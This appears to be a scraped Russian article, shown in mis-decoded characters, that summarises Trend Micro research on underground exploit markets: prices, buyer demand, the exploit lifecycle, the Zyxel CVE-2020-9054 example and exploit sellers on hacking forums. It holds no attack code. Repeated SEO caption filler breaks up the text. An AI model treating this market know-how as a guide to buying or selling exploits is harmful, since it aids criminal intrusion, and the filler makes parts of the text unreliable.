Π•Ρ‰Ρ‘ ΠΎΠ΄Π½Π° ΠΏΡ€ΠΈΡ‡ΠΈΠ½Π° ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½ β€” появлСниС Π½ΠΎΠ²ΠΎΠ³ΠΎ горячСго Ρ‚ΠΎΠ²Π°Ρ€Π°, access-as-a-service, Ρ‚. Π΅. «доступ ΠΊΠ°ΠΊ услуга». Ворговля доступом ΠΊ систСмам оказываСтся Π±ΠΎΠ»Π΅Π΅ ΠΏΡ€ΠΈΠ±Ρ‹Π»ΡŒΠ½ΠΎΠΉ, Ρ‡Π΅ΠΌ торговля N-day-эксплойтами, ΠΏΠΎΡΠΊΠΎΠ»ΡŒΠΊΡƒ ΠΏΡ€ΠΎΠ΄Π°Π²Ρ†Ρ‹ Ρ‚Ρ€Π΅Π±ΡƒΡŽΡ‚ Π·Π° доступ Π±ΠΎΠ»Π΅Π΅ высокиС Ρ†Π΅Π½Ρ‹, Ρ‡Π΅ΠΌ Π·Π° ΠΏΠΎΠ»ΡƒΡ„Π°Π±Ρ€ΠΈΠΊΠ°Ρ‚ β€” эксплойт, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΌ Π΅Ρ‰Ρ‘ Π½ΡƒΠΆΠ½ΠΎ ΡΡƒΠΌΠ΅Ρ‚ΡŒ ΠΏΡ€Π°Π²ΠΈΠ»ΡŒΠ½ΠΎ Π²ΠΎΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒΡΡ. Π‘ Ρ‚ΠΎΡ‡ΠΊΠΈ зрСния Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π° доступ ΠΊΠ°ΠΊ услуга ΠΈΠΌΠ΅Π΅Ρ‚ всС прСимущСства эксплойта, Π½ΠΎ вся чСрновая ΠΈ слоТная тСхничСская Ρ€Π°Π±ΠΎΡ‚Π° ΡƒΠΆΠ΅ ΠΏΡ€ΠΎΠ΄Π΅Π»Π°Π½Π° Π·Π° покупатСля.

Π’Π΅ΠΌ Π½Π΅ ΠΌΠ΅Π½Π΅Π΅, Ρ€Ρ‹Π½ΠΎΠΊ эксплойтов всё Π΅Ρ‰Ρ‘ Π΄Π°Π»Ρ‘ΠΊ ΠΎΡ‚ ΠΏΠΎΠ»Π½ΠΎΠ³ΠΎ угасания. Π”Π°ΠΆΠ΅ послС раскрытия ΠΈ исправлСния уязвимости эксплойты для Π½Π΅Ρ‘ ΠΏΡ€ΠΎΠ΄ΠΎΠ»ΠΆΠ°ΡŽΡ‚ ΠΏΡ€ΠΎΠ΄Π°Π²Π°Ρ‚ΡŒΡΡ Π½Π° ΠΏΠΎΠ΄ΠΏΠΎΠ»ΡŒΠ½Ρ‹Ρ… Ρ€Ρ‹Π½ΠΊΠ°Ρ… Π² Ρ‚Π΅Ρ‡Π΅Π½ΠΈΠ΅ ΠΌΠ½ΠΎΠ³ΠΈΡ… мСсяцСв ΠΈΠ»ΠΈ Π΄Π°ΠΆΠ΅ Π»Π΅Ρ‚.

Как ΠΏΠΎΠΊΠ°Π·Ρ‹Π²Π°Π΅Ρ‚ нашС исслСдованиС, наибольшим спросом ΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ΡΡ эксплойты для ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚ΠΎΠ² Microsoft β€” ΠΈΡ… Ρ€Π°Π·Ρ‹ΡΠΊΠΈΠ²Π°ΡŽΡ‚ 47% ΠΏΠΎΠΊΡƒΠΏΠ°Ρ‚Π΅Π»Π΅ΠΉ. ΠŸΡ€ΠΈ этом 61% всСх объявлСний ΠΎ ΠΏΡ€ΠΎΠ΄Π°ΠΆΠ΅ эксплойтов Ρ‚Π°ΠΊΠΆΠ΅ посвящСны уязвимостям Π² ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚Π°Ρ… Microsoft.

Випичная Ρ†Π΅Π½Π°, ΠΊΠΎΡ‚ΠΎΡ€ΡƒΡŽ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΠΈ Ρ„ΠΎΡ€ΡƒΠΌΠΎΠ² Π³ΠΎΡ‚ΠΎΠ²Ρ‹ Π·Π°ΠΏΠ»Π°Ρ‚ΠΈΡ‚ΡŒ Π·Π° Π·Π°ΠΏΡ€ΠΎΡˆΠ΅Π½Π½Ρ‹Π΅ эксплойты N-day, составляла 2 тыс. Π΄ΠΎΠ»Π»Π°Ρ€ΠΎΠ² БША. Эксплойты 0-day ΠΎΡ†Π΅Π½ΠΈΠ²Π°Π»ΠΈΡΡŒ Π½Π°ΠΌΠ½ΠΎΠ³ΠΎ Π΄ΠΎΡ€ΠΎΠΆΠ΅ β€” Π² 10 тыс. Π΄ΠΎΠ»Π»Π°Ρ€ΠΎΠ² БША. Однако Π²ΡΡ‚Ρ€Π΅Ρ‡Π°ΡŽΡ‚ΡΡ ΠΈ Π·Π½Π°Ρ‡ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ Π±ΠΎΠ»Π΅Π΅ Π±ΡŽΠ΄ΠΆΠ΅Ρ‚Π½Ρ‹Π΅ прСдлоТСния β€” Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, N-day-эксплойты для JavaScript Π·Π° 40 Π΄ΠΎΠ»Π»Π°Ρ€ΠΎΠ² БША ΠΈΠ»ΠΈ для Microsoft Word Π·Π° 100 Π΄ΠΎΠ»Π»Π°Ρ€ΠΎΠ² БША. Иногда ΠΌΡ‹ встрСчали Π½Π° англоязычных Ρ„ΠΎΡ€ΡƒΠΌΠ°Ρ… бСсплатныС эксплойты. Π‘Ρ‚ΠΎΠΈΡ‚ ΠΎΡ‚ΠΌΠ΅Ρ‚ΠΈΡ‚ΡŒ, Ρ‡Ρ‚ΠΎ Ρ†Π΅Π½Ρ‹ Π½Π° русскоязычных ΠΏΠΎΠ΄ΠΏΠΎΠ»ΡŒΠ½Ρ‹Ρ… Ρ„ΠΎΡ€ΡƒΠΌΠ°Ρ… ΠΎΠ±Ρ‹Ρ‡Π½ΠΎ Π²Ρ‹ΡˆΠ΅, Ρ‡Π΅ΠΌ Π½Π° англоязычных.

Π–ΠΈΠ·Π½Π΅Π½Π½Ρ‹ΠΉ Ρ†ΠΈΠΊΠ» эксплойта

Π’ΠΈΠΏΠΈΡ‡Π½Ρ‹ΠΉ ΠΆΠΈΠ·Π½Π΅Π½Π½Ρ‹ΠΉ Ρ†ΠΈΠΊΠ» эксплойта 0-day-уязвимости выглядит ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ:

Π Π°Π·Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊ прСдставляСт Π΄ΠΎΠΊΠ°Π·Π°Ρ‚Π΅Π»ΡŒΡΡ‚Π²ΠΎ ΠΊΠΎΠ½Ρ†Π΅ΠΏΡ†ΠΈΠΈ эксплойта (Proof of Concept, PoC) ΠΈΠ»ΠΈ создаёт Ρ€Π°Π±ΠΎΡ‡ΠΈΠΉ эксплойт.

ΠŸΡ€ΠΎΠ΄Π°Π²Ρ†Ρ‹ ΠΏΡ€Π΅Π΄Π»Π°Π³Π°ΡŽΡ‚ эксплойт Π½Π° кибСрпрСступных Ρ‚ΠΎΡ€Π³ΠΎΠ²Ρ‹Ρ… ΠΏΠ»ΠΎΡ‰Π°Π΄ΠΊΠ°Ρ….

Об уязвимости становится извСстно ΠΏΠΎΡΡ‚Ρ€Π°Π΄Π°Π²ΡˆΠ΅ΠΌΡƒ Π²Π΅Π½Π΄ΠΎΡ€Ρƒ.

Π’Π΅Π½Π΄ΠΎΡ€ выпускаСт исправлСниС для уязвимости.

a. ΠΏΡ€ΠΎΠ΄ΠΎΠ»ΠΆΠ°ΡŽΡ‚ ΠΏΡ€ΠΎΠ΄Π°Π²Π°Ρ‚ΡŒ эксплойт Π² Ρ‚Π΅Ρ‡Π΅Π½ΠΈΠ΅ ΠΊΠ°ΠΊ ΠΌΠΈΠ½ΠΈΠΌΡƒΠΌ Π΄Π²ΡƒΡ… Π»Π΅Ρ‚ ΠΏΠΎ Π±ΠΎΠ»Π΅Π΅ Π½ΠΈΠ·ΠΊΠΎΠΉ Ρ†Π΅Π½Π΅, часто объСдиняя Π΅Π³ΠΎ с Π΄Ρ€ΡƒΠ³ΠΈΠΌΠΈ эксплойтами для получСния большСй ΠΏΡ€ΠΈΠ±Ρ‹Π»ΠΈ;
b. ΠΏΡ€Π΅ΠΊΡ€Π°Ρ‰Π°ΡŽΡ‚ ΠΏΡ€ΠΎΠ΄Π°ΠΆΡƒ эксплойта.

Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ Ρ„ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ ΠΊΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΡƒ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. ΠšΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΠ° ΠΏΡ€ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π€ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитомВипичный ΠΆΠΈΠ·Π½Π΅Π½Π½Ρ‹ΠΉ Ρ†ΠΈΠΊΠ» эксплойта. Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ (здСсь ΠΈ Π΄Π°Π»Π΅Π΅, Ссли Π½Π΅ ΡƒΠΊΠ°Π·Π°Π½ΠΎ ΠΈΠ½ΠΎΠ΅): Trend Micro

Π’ΠΎΡ‚ ΠΊΠ°ΠΊ выглядит ΠΆΠΈΠ·Π½Π΅Π½Π½Ρ‹ΠΉ Ρ†ΠΈΠΊΠ» эксплойта для RCE-уязвимости CVE-2020-9054 Π² сСтСвых Ρ…Ρ€Π°Π½ΠΈΠ»ΠΈΡ‰Π°Ρ… Zyxel, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ распространяСтся ΠΏΠΎ ΠΊΡ€Π°ΠΉΠ½Π΅ΠΉ ΠΌΠ΅Ρ€Π΅ с фСвраля 2020 Π³ΠΎΠ΄Π°. Π­Ρ‚Π° ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ позволяСт ΡƒΠ΄Π°Π»Ρ‘Π½Π½ΠΎ Π²Ρ‹ΠΏΠΎΠ»Π½ΠΈΡ‚ΡŒ ΠΏΡ€ΠΎΠΈΠ·Π²ΠΎΠ»ΡŒΠ½Ρ‹ΠΉ ΠΊΠΎΠ΄ (Remote Code Execution, RCE) Π² Π·Π°Ρ‚Ρ€ΠΎΠ½ΡƒΡ‚Ρ‹Ρ… ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚Π°Ρ… ΠΊΠΎΠΌΠΏΠ°Π½ΠΈΠΈ Zyxel.

Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ Ρ„ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ ΠΊΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΡƒ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. ΠšΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΠ° ΠΏΡ€ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π€ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитомЖизнСнный Ρ†ΠΈΠΊΠ» эксплойта для уязвимости CVE-2020-9054 Π² Zyxel NAS. Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ: Trend Micro

ВсСго Π·Π° ΡˆΠ΅ΡΡ‚ΡŒ мСсяцСв эксплойт подСшСвСл Π² Π΄Π΅ΡΡΡ‚ΡŒ Ρ€Π°Π· β€” с 20 тыс. Π΄ΠΎ 2 тыс. Π΄ΠΎΠ»Π»Π°Ρ€ΠΎΠ² БША.

Π Π°Π·Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊΠΈ эксплойтов

Π”Π΅ΡΡ‚Π΅Π»ΡŒΠ½ΠΎΡΡ‚ΡŒ Ρ€Π°Π·Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊΠΎΠ² эксплойтов нСльзя Π½Π°Π·Π²Π°Ρ‚ΡŒ простой. Π˜Π·ΡƒΡ‡Π°Ρ Ρ„ΠΎΡ€ΡƒΠΌΡ‹, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ занимались ΠΏΡ€ΠΎΠ΄Π°ΠΆΠ΅ΠΉ эксплойтов Π² Ρ‚Π΅Ρ‡Π΅Π½ΠΈΠ΅ Π½Π΅ΡΠΊΠΎΠ»ΡŒΠΊΠΈΡ… Π»Π΅Ρ‚, ΠΌΡ‹ ΡƒΠ±Π΅Π΄ΠΈΠ»ΠΈΡΡŒ, Ρ‡Ρ‚ΠΎ Π½ΠΎΠ²Ρ‹ΠΌ ΠΏΡ€ΠΎΠ΄Π°Π²Ρ†Π°ΠΌ довольно слоТно Π²ΠΎΠΉΡ‚ΠΈ Π² этот бизнСс, ΠΏΠΎΡ‚ΠΎΠΌΡƒ Ρ‡Ρ‚ΠΎ ΠΈΡ… ΠΎΠ±Ρ‹Ρ‡Π½ΠΎ Ρ‚Ρ‰Π°Ρ‚Π΅Π»ΡŒΠ½ΠΎ ΠΏΡ€ΠΎΠ²Π΅Ρ€ΡΡŽΡ‚ ΠΈ всё Ρ€Π°Π²Π½ΠΎ относятся с Π½Π΅Π΄ΠΎΠ²Π΅Ρ€ΠΈΠ΅ΠΌ. НапримСр, Π½Π° Ρ„ΠΎΡ€ΡƒΠΌΠ΅ Hack Forums ΠΌΡ‹ ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ»ΠΈ Π½ΠΎΠ²ΠΎΠ³ΠΎ Ρ€Π°Π·Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊΠ° эксплойтов, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ пытался ΠΏΡ€ΠΎΠ΄Π°Ρ‚ΡŒ сборку эксплойтов PDF Π½ΡƒΠ»Π΅Π²ΠΎΠ³ΠΎ дня Π·Π° 950 Π΄ΠΎΠ»Π»Π°Ρ€ΠΎΠ² БША Π² сСнтябрС 2020 Π³ΠΎΠ΄Π°. ΠŸΡ€ΠΎΠ΄Π°Π²Π΅Ρ† Π±Ρ‹Π» ΠΏΠΎΠ΄Π²Π΅Ρ€Π³Π½ΡƒΡ‚ сомнСнию Π·Π° Ρ‚ΠΎ, Ρ‡Ρ‚ΠΎ ΠΎΠ½ ΠΏΡ€ΠΎΠ±Ρ‹Π» Π½Π° Hack Forums всСго мСсяц. ΠšΡ€ΠΎΠΌΠ΅ Ρ‚ΠΎΠ³ΠΎ, ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΠΈ Π½Π΅ ΠΏΠΎΠ²Π΅Ρ€ΠΈΠ»ΠΈ Π΅ΠΌΡƒ, ΠΏΠΎΡΠΊΠΎΠ»ΡŒΠΊΡƒ настоящий эксплойт Π½ΡƒΠ»Π΅Π²ΠΎΠ³ΠΎ дня стоит ΠΎΡ‚ 5 000 Π΄ΠΎ 10 000 Π΄ΠΎΠ»Π»Π°Ρ€ΠΎΠ² БША. Π’ настоящСС врСмя этот ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ большС Π½Π΅ зарСгистрирован Π½Π° Hack Forums.

МногиС ΠΎΠΏΡ‹Ρ‚Π½Ρ‹Π΅ ΠΏΡ€ΠΎΠ΄Π°Π²Ρ†Ρ‹ Π·Π°Ρ€Π°Π±Π°Ρ‚Ρ‹Π²Π°ΡŽΡ‚ свою Ρ€Π΅ΠΏΡƒΡ‚Π°Ρ†ΠΈΡŽ Π³ΠΎΠ΄Π°ΠΌΠΈ. Для этого ΠΎΠ½ΠΈ Π½Π΅ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ ΠΏΡ€ΠΎΠ΄Π°ΡŽΡ‚ эксплойты, Π½ΠΎ ΠΈ ΠΏΠΎΠΊΡƒΠΏΠ°ΡŽΡ‚ ΠΈΡ….

ΠŸΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΠΈ Ρ„ΠΎΡ€ΡƒΠΌΠΎΠ² часто ΠΎΠ±ΡΡƒΠΆΠ΄Π°ΡŽΡ‚ Π»Π΅Π³Π°Π»ΡŒΠ½Ρ‹Π΅ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹ вознаграТдСния Π·Π° ошибки Π² ΠΏΠΎΠ»ΠΎΠΆΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎΠΌ ΠΊΠ»ΡŽΡ‡Π΅. На Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… англоязычных Ρ„ΠΎΡ€ΡƒΠΌΠ°Ρ… ΠΌΡ‹ встрСтили ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ, Ρ€Π°Π·ΠΌΠ΅Ρ‰Π°ΡŽΡ‰ΠΈΡ… руководства ΠΈ совСты ΠΎ Ρ‚ΠΎΠΌ, ΠΊΠ°ΠΊ ΠΎΡ‚ΠΏΡ€Π°Π²Π»ΡΡ‚ΡŒ эксплойты Π² ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹ вознаграТдСния Π·Π° Π±Π°Π³ΠΈ. ΠœΡ‹ Ρ‚Π°ΠΊΠΆΠ΅ Π²ΠΈΠ΄Π΅Π»ΠΈ ΡƒΡ‚Π΅Ρ‡ΠΊΡƒ курса ΠΎΡ€Π³Π°Π½ΠΈΠ·Π°Ρ†ΠΈΠΈ SANS Institute ΠΏΠΎ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°ΠΌ Bug Bounty ΠΈ отвСтствСнному Ρ€Π°ΡΠΊΡ€Ρ‹Ρ‚ΠΈΡŽ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ распространялся бСсплатно.

Однако другая Ρ‡Π°ΡΡ‚ΡŒ участников Ρ„ΠΎΡ€ΡƒΠΌΠΎΠ² ΠΆΠ°Π»ΡƒΡŽΡ‚ΡΡ Π½Π° ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹ Bug Bounty. Π‘Ρ€Π΅Π΄ΠΈ ΠΆΠ°Π»ΠΎΠ± β€” Π΄ΠΎΠ»Π³ΠΎΠ΅ ΠΎΠΆΠΈΠ΄Π°Π½ΠΈΠ΅ ΠΎΡ‚Π²Π΅Ρ‚Π°, ΠΏΡ€Π΅Π²Ρ‹ΡˆΠ΅Π½ΠΈΠ΅ допустимого количСства заявок ΠΈ ΠΏΡ€ΠΎΠ±Π»Π΅ΠΌΡ‹ с Π²Ρ‹ΠΏΠ»Π°Ρ‚Π°ΠΌΠΈ. Для Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… Ρ€Π°Π·Ρ€Π°Π±ΠΎΡ‚Ρ‡ΠΈΠΊΠΎΠ² эксплойтов эти ΠΈ Π΄Ρ€ΡƒΠ³ΠΈΠ΅ нСдостатки ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ Bug Bounty ΡΠ²Π»ΡΡŽΡ‚ΡΡ достаточной ΠΏΡ€ΠΈΡ‡ΠΈΠ½ΠΎΠΉ для Ρ‚ΠΎΠ³ΠΎ, Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΠΏΡ€ΠΎΠ΄Π°Π²Π°Ρ‚ΡŒ свои эксплойты Π² кибСрпрСступном подпольС, Π° Π½Π΅ ΠΌΡƒΡ‡ΠΈΡ‚ΡŒΡΡ с Π»Π΅Π³Π°Π»ΡŒΠ½Ρ‹ΠΌ Π±Π°Π³Ρ…Π°Π½Ρ‚ΠΈΠ½Π³ΠΎΠΌ.

Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ Ρ„ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ ΠΊΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΡƒ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. ΠšΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΠ° ΠΏΡ€ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π€ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ ΡΠΊΡΠΏΠ»ΠΎΠΈΡ‚ΠΎΠΌΠŸΠΎΡΡ‚ с ΠΊΡ€ΠΈΡ‚ΠΈΠΊΠΎΠΉ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ Bug Bounty. Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ: Trend Micro

НСбольшая Π³Ρ€ΡƒΠΏΠΏΠ° Π½Π΅Π΄ΠΎΠ²ΠΎΠ»ΡŒΠ½Ρ‹Ρ… Π±Π°Π³Ρ…Π°Π½Ρ‚Π΅Ρ€ΠΎΠ² ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ ΠΊΠΈΠ±Π΅Ρ€Ρ„ΠΎΡ€ΡƒΠΌΡ‹ Π½Π΅ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ для ΠΏΡ€ΠΎΠ΄Π°ΠΆΠΈ своих эксплойтов, Π½ΠΎ ΠΈ для поиска ΠΆΠ΅Π»Π°ΡŽΡ‰ΠΈΡ… Π²ΠΎΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒΡΡ ΠΈΡ… Π½Π°Π²Ρ‹ΠΊΠ°ΠΌΠΈ кодирования.

НапримСр, ΠΌΡ‹ Π²ΠΈΠ΄Π΅Π»ΠΈ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ Π½Π° Hack Forums, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ прСдоставил ΡΠΊΡ€ΠΈΠ½ΡˆΠΎΡ‚Ρ‹ своих заявок Π½Π° участиС Π² ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ΅ Bug Bounty, ΠΏΡ€Π΅Π΄Π»ΠΎΠΆΠΈΠ» свои услуги ΠΏΠΎ ΠΊΠΎΠ΄ΠΈΡ€ΠΎΠ²Π°Π½ΠΈΡŽ ΠΈ искал ΠΏΠΎΡ‚Π΅Π½Ρ†ΠΈΠ°Π»ΡŒΠ½Ρ‹Ρ… ΠΏΠΎΠΊΡƒΠΏΠ°Ρ‚Π΅Π»Π΅ΠΉ своих эксплойтов. Π”Ρ€ΡƒΠ³ΠΎΠΉ ΠΏΡ€ΠΈΠΌΠ΅Ρ€ β€” ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΡŒ Π½Π° RaidForums, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ Ρ€Π΅ΡˆΠΈΠ» ΠΏΡ€ΠΎΠ΄Π°Ρ‚ΡŒ свои эксплойты для использования кибСрпрСступниками вмСсто Ρ‚ΠΎΠ³ΠΎ, Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΠΎΡ‚ΠΏΡ€Π°Π²ΠΈΡ‚ΡŒ ΠΈΡ… Π² Bug Bounty:

Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ Ρ„ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ ΠΊΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΡƒ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. ΠšΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΠ° ΠΏΡ€ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π€ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ ΡΠΊΡΠΏΠ»ΠΎΠΈΡ‚ΠΎΠΌΠžΠ±ΡŠΡΠ²Π»Π΅Π½ΠΈΠ΅ ΠΎ ΠΏΡ€ΠΎΠ΄Π°ΠΆΠ΅ эксплойтов Π½Π° RaidForums. Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ: Trend Micro

Бпрос ΠΈ ΠΏΡ€Π΅Π΄Π»ΠΎΠΆΠ΅Π½ΠΈΠ΅

ΠœΡ‹ ΠΈΠ·ΡƒΡ‡ΠΈΠ»ΠΈ объявлСния ΠΎ ΠΏΡ€ΠΎΠ΄Π°ΠΆΠ΅ эксплойтов, отсСяв ΠΏΡ€Π΅Π΄ΠΏΠΎΠ»ΠΎΠΆΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ ΠΌΠΎΡˆΠ΅Π½Π½ΠΈΡ‡Π΅ΡΠΊΠΈΠ΅ ΠΈΠ»ΠΈ ΠΎΠΏΡƒΠ±Π»ΠΈΠΊΠΎΠ²Π°Π½Π½Ρ‹Π΅ участниками с Π½ΠΈΠ·ΠΊΠΎΠΉ Ρ€Π΅ΠΏΡƒΡ‚Π°Ρ†ΠΈΠ΅ΠΉ. ΠœΡ‹ Ρ‚Π°ΠΊΠΆΠ΅ посмотрСли, ΠΊΠ°ΠΊΠΈΠ΅ эксплойты ΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ΡΡ спросом.

Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ Ρ„ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ ΠΊΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΡƒ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. ΠšΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΠ° ΠΏΡ€ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π€ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитомБамыС вострСбованныС эксплойты Π½Π° ΠΊΠΈΠ±Π΅Ρ€Ρ„ΠΎΡ€ΡƒΠΌΠ°Ρ…

